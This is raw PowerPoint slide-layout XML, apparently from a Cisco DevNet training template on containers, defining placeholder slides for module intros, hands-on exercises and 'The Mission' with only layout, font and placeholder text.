              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE063E5F-50C9-084E-8F8E-FA921FA4FE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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9068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NE Module Intro">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="341314"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Module URL (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>learninglabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA2741B3-4C07-2F4B-AC2B-7887DE739F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1284890"/>
            <a:ext cx="8345488" cy="3263586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learning Lab Module Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228035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Hands On Exercise">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="637382"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Lab Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591D7585-EC32-AF4B-AC6D-18D793602D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1888761"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives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59F7CAC2-E697-0447-A314-412B22FAD525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362607" y="315630"/>
            <a:ext cx="2329484" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BB0379-7718-0448-AE43-29AB7AF168A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880510" y="341136"/>
            <a:ext cx="2902744" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="142872" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="261931" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="333367" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="404802" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4713D7A6-8EA3-4D43-A84B-0D40DD7ED047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1883080"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caveats, reminders, things to note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A3B4B5F1-DDF5-904C-B731-F491D98C1483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1432782"/>
            <a:ext cx="1462260" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF4FE45A-5E5A-B344-B80B-522FEE2CC166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1435483"/>
            <a:ext cx="2475358" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Things to Consider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361790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ission">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="637382"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Lab Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591D7585-EC32-AF4B-AC6D-18D793602D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1888761"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives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59F7CAC2-E697-0447-A314-412B22FAD525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362607" y="315630"/>
            <a:ext cx="1529586" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BB0379-7718-0448-AE43-29AB7AF168A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880510" y="341136"/>
            <a:ext cx="2902744" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="142872" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="261931" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="333367" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="404802" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4713D7A6-8EA3-4D43-A84B-0D40DD7ED047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1883080"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caveats, reminders, things to note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14B64618-BCE9-A94F-B91D-F217B1F81910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1432782"/>
            <a:ext cx="1462260" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C6D4A86-0A38-3B40-8098-304C87AD2557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4761186" y="1435483"/>
            <a:ext cx="2475358" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" u="sng" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Things to Consider</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35458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lumMod val="75000"/>
                  </a:schemeClr>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421948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Segue_White">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203376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DCI Mission Break">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618CC10-7F93-7A41-8993-E9C1B07FFE6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63057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B2E071-87AA-2944-BFC9-B34F7C96CED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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F92A122-F59E-2149-A6EC-A06ADF0658CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ECB6CF1-430E-B94D-893E-83FAC898546B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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8806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CI Mission Break">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618CC10-7F93-7A41-8993-E9C1B07FFE6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63057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEE6027-B3CE-2649-BB30-A6CB8DFB6CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE8B9CC-DA30-724D-88D8-CB0C12E21A5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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B2E071-87AA-2944-BFC9-B34F7C96CED5}"/>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17230" y="3959641"/>
